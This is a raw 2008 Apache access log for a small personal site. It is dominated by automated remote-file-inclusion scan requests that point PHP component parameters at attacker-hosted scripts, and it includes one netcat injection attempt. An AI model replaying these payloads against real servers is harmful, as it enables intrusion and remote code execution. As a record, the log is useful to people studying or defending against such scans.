209.97.201.148 - - [07/Aug/2008:03:26:05 -0500] "GET /logs/access_log.1212883200%22%20%20lang=%22nl%22%3ETomdolan.pconline.com%3C/a%3E%3C/h3%3E%3C/div%3E%3Cdiv%20class=%22abstr%22%20lang=%22nl%22%3EHTTP/1.1%22%20404%20324%20%22-%22%22libwww-perl/5.76%22%2062.140.19.142%20-%20-%20[07/Jun/2008:19:02:27%20...%20Slurp;%20http:/help.yahoo.com/help/us/ysearch/slurp)%22%2087.106.101.24%20-%20-%20[07/Jun%20...%3C/div%3E%3Cspan%20class=url%3Etomdolan.pconline.com/logs/access_%3Cwbr%20/%3Elog.1212883200%3C/span%3E%20-%20%3Cem%3E304k%3C/em%3E%3C/div%3E%3C/li%3E%3Cli%3E%3Cdiv%20class=%22res%22%3E%3Cdiv%3E%3Ch3%3E%3Ca%20class=%22yschttl%22%20href=%22http:/rds.yahoo.com/_ylt=A0oGkxMGr5pIPFIBna1XNyoA;_ylu=X3oDMTB0MWZscWdvBHNlYwNzcgRwb3MDODc2BGNvbG8Dc2sxBHZ0aWQD/SIG=126kn0bnp/EXP=1218183302/**http%3a/zhuaxia.com/pre_channel/122350/%3flogId=181%22%20%20lang=%22zh%22%3EWEB%20-%20%20-%20%3C/a%3E%3C/h3%3E%3C/div%3E%3Cdiv%20class=%22abstr%22%20lang=%22zh%22%3EWEB%20-%20%20...%20277%20%7C%201-10%20%7C%20%20%201%202%203%204%205%206%207%208%209%2010%2011%20>%200%20%20.%20MD5()%20...%20components/com_mp3_allopass/allopass.php?%20...%3C/div%3E%3Cspan%20class=url%3Ezhuaxia.com/pre_channel/122350/%3Cwbr%20/%3E?logId=181%3C/span%3E%20-%20%3Cem%3E148k%3C/em%3E%3C/div%3E%3C/li%3E%3Cli%3E%3Cdiv%20class=%22res%22%3E%3Cdiv%3E%3Ch3%3E%3Ca%20class=%22yschttl%22%20href=%22http:/rds.yahoo.com/_ylt=A0oGkxMGr5pIPFIBnq1XNyoA;_ylu=X3oDMTB0NTJtNzhvBHNlYwNzcgRwb3MDODc3BGNvbG8Dc2sxBHZ0aWQD/SIG=12dhfd4kk/EXP=1218183302/**http%3a/dvd.czdc.cz/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://reisebuerotechnik24.de/foggian.txt??? HTTP/1.1" 404 1218 "-""libwww-perl/5.79"
69.57.154.47 - - [07/Aug/2008:03:27:42 -0500] "GET /logs/access_log.1208044800//modules/xfsection/modify.php?dir_module=http://www.posidynegroup.com/.../image.txt? HTTP/1.1" 404 340 "-""libwww-perl/5.810"
69.57.154.47 - - [07/Aug/2008:03:27:42 -0500] "GET //modules/xfsection/modify.php?dir_module=http://www.posidynegroup.com/.../image.txt? HTTP/1.1" 404 313 "-""libwww-perl/5.810"
69.57.154.47 - - [07/Aug/2008:03:27:43 -0500] "GET /logs//modules/xfsection/modify.php?dir_module=http://www.posidynegroup.com/.../image.txt? HTTP/1.1" 404 318 "-""libwww-perl/5.810"
85.17.150.2 - - [07/Aug/2008:03:28:10 -0500] "GET /logs/access_log.1214438400//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.hogwarts-bg.net//news/templates/sistem.gif??? HTTP/1.1" 404 321 "-""libwww-perl/5.805"
85.17.150.2 - - [07/Aug/2008:03:28:11 -0500] "GET //index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.hogwarts-bg.net//news/templates/sistem.gif??? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
85.17.150.2 - - [07/Aug/2008:03:28:11 -0500] "GET /logs//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.hogwarts-bg.net//news/templates/sistem.gif??? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
194.228.3.42 - - [07/Aug/2008:03:28:12 -0500] "GET / HTTP/1.0" 200 1231 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)"
194.228.3.42 - - [07/Aug/2008:03:28:13 -0500] "GET /?S=http%3A%2F%2Fhonamfishing.co.kr%2Fphpmysqladmin%2Flibraries%2Fnov%2Fomozome%2F HTTP/1.0" 200 1231 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)"
194.228.3.42 - - [07/Aug/2008:03:28:13 -0500] "GET /?S=http%3A%2F%2Fwww.unduetretoccaate.it%2Fcodice%2Ffog%2Fazato%2F HTTP/1.0" 200 1231 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)"
194.228.3.42 - - [07/Aug/2008:03:28:13 -0500] "GET /?S=http%3A%2F%2Fsans-packing.ru%2Fimg%2Fjipeqap%2Fehudute%2F HTTP/1.0" 200 1231 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)"
194.228.3.42 - - [07/Aug/2008:03:28:14 -0500] "GET /?M=http%3A%2F%2Fwww.antwerpsupporter.be%2Fmvdm_polls%2Fincludeold%2Folom%2Fyeq%2F HTTP/1.0" 200 1231 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)"
194.228.3.42 - - [07/Aug/2008:03:28:14 -0500] "GET /?M=http%3A%2F%2Fwww.oriolmanya.net%2Fnautilus%2FphpBB2%2Flanguage%2Flang_english%2Fifekeri%2Fidupas%2F HTTP/1.0" 200 1231 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)"
194.228.3.42 - - [07/Aug/2008:03:28:14 -0500] "GET /?M=http%3A%2F%2Fchyngachanga.ru%2Fcontent%2Fwuge%2Fowofi%2F HTTP/1.0" 200 1231 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)"
194.228.3.42 - - [07/Aug/2008:03:28:14 -0500] "GET /?N=http%3A%2F%2Fwww.unduetretoccaate.it%2Fcodice%2Ffog%2Fazato%2F HTTP/1.0" 200 1231 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)"
194.228.3.42 - - [07/Aug/2008:03:28:15 -0500] "GET /?N=http%3A%2F%2Fwww.tcmforum.com%2Flayout%2Foxiqade%2Fxocuwo%2F HTTP/1.0" 200 1231 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)"
194.228.3.42 - - [07/Aug/2008:03:28:15 -0500] "GET /?N=http%3A%2F%2Fwww.oriolmanya.net%2Fnautilus%2FphpBB2%2Flanguage%2Flang_english%2Fifekeri%2Fidupas%2F HTTP/1.0" 200 1231 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)"
194.228.3.42 - - [07/Aug/2008:03:28:15 -0500] "GET /?D=http%3A%2F%2Fwww.psikolojikyardim.org%2Fetkinlik%2Finclude%2Feto%2Frix%2Fjas%2F HTTP/1.0" 200 1231 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)"
194.228.3.42 - - [07/Aug/2008:03:28:16 -0500] "GET /?D=http%3A%2F%2Fwww.filter-international.com%2Fwebservice%2Faro%2Fpefosi%2F HTTP/1.0" 200 1231 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)"
194.228.3.42 - - [07/Aug/2008:03:28:16 -0500] "GET /?D=http%3A%2F%2Fwww.kidspace-epe.com%2Fphotos%2Fenahur%2Favid%2F HTTP/1.0" 200 1231 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)"
194.228.3.42 - - [07/Aug/2008:03:28:16 -0500] "GET /rachel%20study/ HTTP/1.0" 200 6339 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)"
194.228.3.42 - - [07/Aug/2008:03:28:17 -0500] "GET /?S=A HTTP/1.0" 200 1231 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)"
194.228.3.42 - - [07/Aug/2008:03:28:17 -0500] "GET /?M=A HTTP/1.0" 200 1231 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)"
194.228.3.42 - - [07/Aug/2008:03:28:17 -0500] "GET /costume/ HTTP/1.0" 200 640 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)"
209.97.201.148 - - [07/Aug/2008:03:28:18 -0500] "GET /components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://reisebuerotechnik24.de/foggian.txt??? HTTP/1.1" 404 324 "-""libwww-perl/5.79"
194.228.3.42 - - [07/Aug/2008:03:28:18 -0500] "GET /memorial/ HTTP/1.0" 200 817 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)"
194.228.3.42 - - [07/Aug/2008:03:28:18 -0500] "GET /?N=D HTTP/1.0" 200 1231 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)"
194.228.3.42 - - [07/Aug/2008:03:28:19 -0500] "GET /logs/ HTTP/1.0" 200 94138 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)"
194.228.3.42 - - [07/Aug/2008:03:28:20 -0500] "GET /tattoo/ HTTP/1.0" 200 466 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)"
194.228.3.42 - - [07/Aug/2008:03:28:20 -0500] "GET /rachel%20study/rachel%20portrait.htm HTTP/1.0" 200 3346 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)"
194.228.3.42 - - [07/Aug/2008:03:28:20 -0500] "GET /?S=D HTTP/1.0" 200 1231 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)"
194.228.3.42 - - [07/Aug/2008:03:28:21 -0500] "GET /?N=A HTTP/1.0" 200 1231 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)"
194.228.3.42 - - [07/Aug/2008:03:28:21 -0500] "GET /?M=D HTTP/1.0" 200 1231 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)"
194.228.3.42 - - [07/Aug/2008:03:28:21 -0500] "GET /costume/costume1.htm HTTP/1.0" 200 4913 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)"
194.228.3.42 - - [07/Aug/2008:03:28:23 -0500] "GET /logs/access_log.1194739200 HTTP/1.0" 200 143981 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)"
194.228.3.42 - - [07/Aug/2008:03:28:25 -0500] "GET /logs/access_log.1206403200 HTTP/1.0" 200 229376 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)"
194.228.3.42 - - [07/Aug/2008:03:28:25 -0500] "GET /tattoo/tattoo1.htm HTTP/1.0" 200 3776 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)"
194.228.3.42 - - [07/Aug/2008:03:28:25 -0500] "GET /rachel%20study/rachel%20saint.htm HTTP/1.0" 200 2291 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)"
194.228.3.42 - - [07/Aug/2008:03:28:25 -0500] "GET /costume/costume2.htm HTTP/1.0" 200 1810 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)"
194.228.3.42 - - [07/Aug/2008:03:28:26 -0500] "GET /tattoo/set4.htm HTTP/1.0" 200 1762 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)"
194.228.3.42 - - [07/Aug/2008:03:28:26 -0500] "GET /rachel%20study/rachel%20animation.htm HTTP/1.0" 200 1570 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)"
194.228.3.42 - - [07/Aug/2008:03:28:26 -0500] "GET /costume/thmb8.htm HTTP/1.0" 200 2957 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)"
194.228.3.42 - - [07/Aug/2008:03:28:27 -0500] "GET /rachel%20study/rachel%20graphics.htm HTTP/1.0" 200 3479 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)"
82.146.39.200 - - [07/Aug/2008:03:28:34 -0500] "GET /logs/bbs//skin/zero_vote/error.php?dir=http://alohaclubhawaii.com/members/community/plugins/safehtml/romid.txt??? HTTP/1.1" 404 318 "-""libwww-perl/5.805"
82.146.39.200 - - [07/Aug/2008:03:28:34 -0500] "GET /logs/bbs//skin/zero_vote/error.php?dir=http://alohaclubhawaii.com/members/community/plugins/safehtml/romid.txt??? HTTP/1.1" 404 318 "-""libwww-perl/5.805"
82.146.39.200 - - [07/Aug/2008:03:28:34 -0500] "GET /bbs//skin/zero_vote/error.php?dir=http://alohaclubhawaii.com/members/community/plugins/safehtml/romid.txt??? HTTP/1.1" 404 313 "-""libwww-perl/5.805"
82.146.39.200 - - [07/Aug/2008:03:28:34 -0500] "GET /bbs//skin/zero_vote/error.php?dir=http://alohaclubhawaii.com/members/community/plugins/safehtml/romid.txt??? HTTP/1.1" 404 313 "-""libwww-perl/5.805"
82.146.39.200 - - [07/Aug/2008:03:28:56 -0500] "GET /logs/access_log.1206230400/bbs//skin/zero_vote/error.php?dir=http://alohaclubhawaii.com/members/community/plugins/safehtml/romid.txt??? HTTP/1.1" 404 340 "-""Mozilla/4.8 [en] (Windows NT 5.0; U)"
82.146.39.200 - - [07/Aug/2008:03:28:57 -0500] "GET /bbs//skin/zero_vote/error.php?dir=http://alohaclubhawaii.com/members/community/plugins/safehtml/romid.txt??? HTTP/1.1" 404 313 "-""Mozilla/4.8 [en] (Windows NT 5.0; U)"
67.236.139.148 - - [07/Aug/2008:03:28:58 -0500] "GET ///vwar/backup/errors.php?error=http://www.freewebs.com/dopeslave/id2.txt?? HTTP/1.1" 404 308 "-""libwww-perl/5.808"
213.33.84.163 - - [07/Aug/2008:03:29:05 -0500] "GET /logs//authentication/phpbb3/phpbb3.functions.php?pConfig_auth[phpbb_path]=http://www.gugn.ru/news/data/archives/arab.txt? HTTP/1.1" 404 332 "-""libwww-perl/5.805"
213.33.84.163 - - [07/Aug/2008:03:29:05 -0500] "GET //authentication/phpbb3/phpbb3.functions.php?pConfig_auth[phpbb_path]=http://www.gugn.ru/news/data/archives/arab.txt? HTTP/1.1" 404 327 "-""libwww-perl/5.805"
212.122.200.198 - - [07/Aug/2008:03:29:10 -0500] "GET /logs/access_log.1201564800%20//////ask_password.php?dir=/module.inc.php?MODULE_FOLDER=%20%22netcat%20require%22%20-p%20103%0D?? HTTP/1.1" 404 333 "-""libwww-perl/5.805"
82.146.39.200 - - [07/Aug/2008:03:29:35 -0500] "GET /logs/access_log.1203638400/bbs//skin/zero_vote/error.php?dir=http://alohaclubhawaii.com/members/community/plugins/safehtml/romid.txt??? HTTP/1.1" 404 340 "-""Mozilla/4.8 [en] (Windows NT 5.0; U)"
82.146.39.200 - - [07/Aug/2008:03:29:50 -0500] "GET /bbs//skin/zero_vote/error.php?dir=http://alohaclubhawaii.com/members/community/plugins/safehtml/romid.txt??? HTTP/1.1" 404 313 "-""libwww-perl/5.805"
85.17.150.2 - - [07/Aug/2008:03:30:37 -0500] "GET /logs/access_log.1213142400//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.hogwarts-bg.net//news/templates/sistem.gif??? HTTP/1.1" 404 321 "-""libwww-perl/5.805"
82.146.39.200 - - [07/Aug/2008:03:31:21 -0500] "GET /logs/access_log.1206230400/bbs//skin/zero_vote/error.php?dir=http://alohaclubhawaii.com/members/community/plugins/safehtml/romid.txt??? HTTP/1.1" 404 340 "-""libwww-perl/5.805"
82.146.39.200 - - [07/Aug/2008:03:31:22 -0500] "GET /bbs//skin/zero_vote/error.php?dir=http://alohaclubhawaii.com/members/community/plugins/safehtml/romid.txt??? HTTP/1.1" 404 313 "-""libwww-perl/5.805"
82.146.39.200 - - [07/Aug/2008:03:31:22 -0500] "GET /logs/bbs//skin/zero_vote/error.php?dir=http://alohaclubhawaii.com/members/community/plugins/safehtml/romid.txt??? HTTP/1.1" 404 318 "-""libwww-perl/5.805"
59.106.19.213 - - [07/Aug/2008:03:31:49 -0500] "GET //bemarket/postscript/postscript.php?p_mode=http://www.cepeduc.com/cepa/images/M.images/idscan8?? HTTP/1.1" 404 319 "-""libwww-perl/5.805"
59.106.19.213 - - [07/Aug/2008:03:31:49 -0500] "GET /logs//bemarket/postscript/postscript.php?p_mode=http://www.cepeduc.com/cepa/images/M.images/idscan8?? HTTP/1.1" 404 324 "-""libwww-perl/5.805"
70.86.186.90 - - [07/Aug/2008:03:32:23 -0500] "GET /logs/access_log.1208044800//modules/xfsection/modify.php?dir_module=http://admin.devilix.org/~ahmad83/download/safe.txt?? HTTP/1.1" 404 340 "-""libwww-perl/5.811"
70.86.186.90 - - [07/Aug/2008:03:32:23 -0500] "GET //modules/xfsection/modify.php?dir_module=http://admin.devilix.org/~ahmad83/download/safe.txt?? HTTP/1.1" 404 313 "-""libwww-perl/5.811"
70.86.186.90 - - [07/Aug/2008:03:32:23 -0500] "GET /logs//modules/xfsection/modify.php?dir_module=http://admin.devilix.org/~ahmad83/download/safe.txt?? HTTP/1.1" 404 318 "-""libwww-perl/5.811"
200.251.162.130 - - [07/Aug/2008:03:32:40 -0500] "GET /logs/access_log.1214438400//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://jancokz.co.cc/cmd.txt? HTTP/1.1" 404 355 "-""libwww-perl/5.805"
200.251.162.130 - - [07/Aug/2008:03:34:24 -0500] "GET /logs/access_log.1212883200//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://jancokz.co.cc/cmd.txt? HTTP/1.1" 404 355 "-""libwww-perl/5.805"
202.84.119.204 - - [07/Aug/2008:03:35:21 -0500] "GET /logs//ashnews.php?pathtoashnews=http://www.urdutimesusa.com/chicago/include/chk2.txt?? HTTP/1.1" 404 301 "-""libwww-perl/5.79"
202.84.119.204 - - [07/Aug/2008:03:35:21 -0500] "GET //ashnews.php?pathtoashnews=http://www.urdutimesusa.com/chicago/include/chk2.txt?? HTTP/1.1" 404 296 "-""libwww-perl/5.79"
82.146.39.200 - - [07/Aug/2008:03:35:28 -0500] "GET /logs/access_log.1203638400/bbs//skin/zero_vote/error.php?dir=http://alohaclubhawaii.com/members/community/plugins/safehtml/romid.txt??? HTTP/1.1" 404 340 "-""libwww-perl/5.805"
202.84.119.204 - - [07/Aug/2008:03:35:36 -0500] "GET /logs//ashnews.php?pathtoashnews=http://www.urdutimesusa.com/chicago/include/chk2.txt?? HTTP/1.1" 404 301 "-""libwww-perl/5.79"
202.84.119.204 - - [07/Aug/2008:03:35:37 -0500] "GET //ashnews.php?pathtoashnews=http://www.urdutimesusa.com/chicago/include/chk2.txt?? HTTP/1.1" 404 296 "-""libwww-perl/5.79"
202.84.119.204 - - [07/Aug/2008:03:36:02 -0500] "GET /logs//ashnews.php?pathtoashnews=http://www.urdutimesusa.com/chicago/include/chk2.txt?? HTTP/1.1" 404 301 "-""libwww-perl/5.79"
202.84.119.204 - - [07/Aug/2008:03:36:03 -0500] "GET //ashnews.php?pathtoashnews=http://www.urdutimesusa.com/chicago/include/chk2.txt?? HTTP/1.1" 404 296 "-""libwww-perl/5.79"
202.84.119.204 - - [07/Aug/2008:03:36:23 -0500] "GET /logs//ashnews.php?pathtoashnews=http://www.urdutimesusa.com/chicago/include/chk2.txt?? HTTP/1.1" 404 301 "-""libwww-perl/5.79"
202.84.119.204 - - [07/Aug/2008:03:36:24 -0500] "GET //ashnews.php?pathtoashnews=http://www.urdutimesusa.com/chicago/include/chk2.txt?? HTTP/1.1" 404 296 "-""libwww-perl/5.79"
67.236.139.148 - - [07/Aug/2008:03:38:00 -0500] "GET /errors.php?error=http://www.freewebs.com/dopeslave/id2.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.808"
200.251.162.130 - - [07/Aug/2008:03:38:57 -0500] "GET ///vwar/backup/errors.php?error=http://jancokz.co.cc/cmd.txt? HTTP/1.1" 404 308 "-""libwww-perl/5.805"
200.251.162.130 - - [07/Aug/2008:03:39:47 -0500] "GET /logs//?path%5Bdocroot%5D=http://jancokz.co.cc/cmd.txt? HTTP/1.1" 200 94316 "-""libwww-perl/5.805"
200.251.162.130 - - [07/Aug/2008:03:39:48 -0500] "GET //?path%5Bdocroot%5D=http://jancokz.co.cc/cmd.txt? HTTP/1.1" 200 1243 "-""libwww-perl/5.805"
69.73.136.95 - - [07/Aug/2008:03:42:44 -0500] "GET /e404.php?DOCUMENT_ROOT=http://www.gugn.ru/news/data/archives/readme.txt?%0D?? HTTP/1.1" 404 292 "-""libwww-perl/5.805"
69.73.136.95 - - [07/Aug/2008:03:42:44 -0500] "GET /logs/e404.php?DOCUMENT_ROOT=http://www.gugn.ru/news/data/archives/readme.txt?%0D?? HTTP/1.1" 404 297 "-""libwww-perl/5.805"
91.121.12.218 - - [07/Aug/2008:03:43:10 -0500] "GET /e404.php?DOCUMENT_ROOT=http://www.gugn.ru/news/data/archives/readme.txt?%0D?? HTTP/1.1" 404 292 "-""libwww-perl/5.803"
91.121.12.218 - - [07/Aug/2008:03:43:10 -0500] "GET /logs/e404.php?DOCUMENT_ROOT=http://www.gugn.ru/news/data/archives/readme.txt?%0D?? HTTP/1.1" 404 297 "-""libwww-perl/5.803"
74.6.18.231 - - [07/Aug/2008:03:44:00 -0500] "GET /logs/access_log.1176336000 HTTP/1.0" 200 199192 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
66.249.70.131 - - [07/Aug/2008:03:44:28 -0500] "GET /costume/thmb2.htm HTTP/1.1" 200 3346 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
200.251.162.130 - - [07/Aug/2008:03:44:37 -0500] "GET /logs/access_log.1213142400//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://jancokz.co.cc/cmd.txt? HTTP/1.1" 404 358 "-""libwww-perl/5.805"
89.111.179.10 - - [07/Aug/2008:03:45:15 -0500] "GET /logs/dfd_cart/app.lib/product.control/core.php/customer.area/customer.browse.list.php?set_depth=http://www.spanishvida.com/.../rid???? HTTP/1.1" 404 369 "-""libwww-perl/5.805"
89.111.179.10 - - [07/Aug/2008:03:45:15 -0500] "GET /dfd_cart/app.lib/product.control/core.php/customer.area/customer.browse.list.php?set_depth=http://www.spanishvida.com/.../rid???? HTTP/1.1" 404 364 "-""libwww-perl/5.805"
77.221.130.6 - - [07/Aug/2008:03:45:38 -0500] "GET /logs/dfd_cart/app.lib/product.control/core.php/customer.area/customer.browse.list.php?set_depth=http://www.spanishvida.com/.../rid???? HTTP/1.1" 404 369 "-""libwww-perl/5.803"
77.221.130.6 - - [07/Aug/2008:03:45:41 -0500] "GET /dfd_cart/app.lib/product.control/core.php/customer.area/customer.browse.list.php?set_depth=http://www.spanishvida.com/.../rid???? HTTP/1.1" 404 364 "-""libwww-perl/5.803"
66.79.163.110 - - [07/Aug/2008:03:46:41 -0500] "GET /logs/?sourcedir=http://www.mamolar.com/~reloj/id.txt?? HTTP/1.1" 200 94311 "-""libwww-perl/5.811"
66.79.163.110 - - [07/Aug/2008:03:46:42 -0500] "GET /?sourcedir=http://www.mamolar.com/~reloj/id.txt?? HTTP/1.1" 200 1243 "-""libwww-perl/5.811"
210.87.251.48 - - [07/Aug/2008:03:47:36 -0500] "GET /logs//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.hogwarts-bg.net//news/templates/sistem.gif??? HTTP/1.0" 404 287 "-""libwww-perl/5.79"
210.87.251.43 - - [07/Aug/2008:03:47:37 -0500] "GET //index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.hogwarts-bg.net//news/templates/sistem.gif??? HTTP/1.0" 404 282 "-""libwww-perl/5.79"
69.57.154.47 - - [07/Aug/2008:03:48:36 -0500] "GET /logs/access_log.1205366400//modules/xfsection/modify.php?dir_module=http://www.posidynegroup.com/.../image.txt? HTTP/1.1" 404 340 "-""libwww-perl/5.810"
69.57.154.47 - - [07/Aug/2008:03:48:37 -0500] "GET //modules/xfsection/modify.php?dir_module=http://www.posidynegroup.com/.../image.txt? HTTP/1.1" 404 313 "-""libwww-perl/5.810"
69.57.154.47 - - [07/Aug/2008:03:48:37 -0500] "GET /logs//modules/xfsection/modify.php?dir_module=http://www.posidynegroup.com/.../image.txt? HTTP/1.1" 404 318 "-""libwww-perl/5.810"
69.57.154.47 - - [07/Aug/2008:03:48:49 -0500] "GET /logs/access_log.1208044800//modules/xfsection/modify.php?dir_module=http://www.posidynegroup.com/.../image.txt? HTTP/1.1" 404 340 "-""libwww-perl/5.810"
91.121.143.183 - - [07/Aug/2008:03:49:03 -0500] "GET /logs/e404.php?DOCUMENT_ROOT=http://www.gugn.ru/news/data/archives/readme.txt?%0D?? HTTP/1.1" 404 297 "-""libwww-perl/5.803"
91.121.143.183 - - [07/Aug/2008:03:49:03 -0500] "GET /e404.php?DOCUMENT_ROOT=http://www.gugn.ru/news/data/archives/readme.txt?%0D?? HTTP/1.1" 404 292 "-""libwww-perl/5.803"
87.106.191.163 - - [07/Aug/2008:03:49:18 -0500] "GET /logs/dfd_cart/app.lib/product.control/core.php/customer.area/customer.browse.list.php?set_depth=uid=10042(susanita)%20gid=2523(psacln)%20groups=16(dialout),33(video),2523(psacln)%0A? HTTP/1.1" 404 369 "-""libwww-perl/5.805"
87.106.191.163 - - [07/Aug/2008:03:49:19 -0500] "GET /dfd_cart/app.lib/product.control/core.php/customer.area/customer.browse.list.php?set_depth=uid=10042(susanita)%20gid=2523(psacln)%20groups=16(dialout),33(video),2523(psacln)%0A? HTTP/1.1" 404 364 "-""libwww-perl/5.805"
77.221.130.6 - - [07/Aug/2008:03:53:41 -0500] "GET /logs/dfd_cart/app.lib/product.control/core.php/customer.area/customer.browse.list.php?set_depth=http://www.spanishvida.com/.../rid???? HTTP/1.1" 404 369 "-""libwww-perl/5.803"
77.221.130.6 - - [07/Aug/2008:03:53:41 -0500] "GET /dfd_cart/app.lib/product.control/core.php/customer.area/customer.browse.list.php?set_depth=http://www.spanishvida.com/.../rid???? HTTP/1.1" 404 364 "-""libwww-perl/5.803"
77.90.20.2 - - [07/Aug/2008:03:54:44 -0500] "GET /logs//ashnews.php?pathtoashnews=http://www.urdutimesusa.com/chicago/include/chk2.txt?? HTTP/1.1" 404 301 "-""libwww-perl/5.805"
77.90.20.2 - - [07/Aug/2008:03:54:50 -0500] "GET //ashnews.php?pathtoashnews=http://www.urdutimesusa.com/chicago/include/chk2.txt?? HTTP/1.1" 404 296 "-""libwww-perl/5.805"
77.90.20.2 - - [07/Aug/2008:03:55:10 -0500] "GET /logs//ashnews.php?pathtoashnews=http://www.urdutimesusa.com/chicago/include/chk2.txt?? HTTP/1.1" 404 301 "-""libwww-perl/5.805"
77.90.20.2 - - [07/Aug/2008:03:55:10 -0500] "GET //ashnews.php?pathtoashnews=http://www.urdutimesusa.com/chicago/include/chk2.txt?? HTTP/1.1" 404 296 "-""libwww-perl/5.805"
77.90.20.2 - - [07/Aug/2008:03:55:23 -0500] "GET /logs//ashnews.php?pathtoashnews=http://www.urdutimesusa.com/chicago/include/chk2.txt?? HTTP/1.1" 404 301 "-""libwww-perl/5.805"
77.90.20.2 - - [07/Aug/2008:03:55:28 -0500] "GET //ashnews.php?pathtoashnews=http://www.urdutimesusa.com/chicago/include/chk2.txt?? HTTP/1.1" 404 296 "-""libwww-perl/5.805"
77.90.20.2 - - [07/Aug/2008:03:56:11 -0500] "GET /logs//ashnews.php?pathtoashnews=http://www.urdutimesusa.com/chicago/include/chk2.txt?? HTTP/1.1" 404 301 "-""libwww-perl/5.805"
77.90.20.2 - - [07/Aug/2008:03:56:16 -0500] "GET //ashnews.php?pathtoashnews=http://www.urdutimesusa.com/chicago/include/chk2.txt?? HTTP/1.1" 404 296 "-""libwww-perl/5.805"
212.122.200.198 - - [07/Aug/2008:03:57:25 -0500] "GET //////ask_password.php?dir=/module.inc.php?MODULE_FOLDER=%20%22netcat%20require%22%20-p%20103%0D?? HTTP/1.1" 404 305 "-""libwww-perl/5.805"
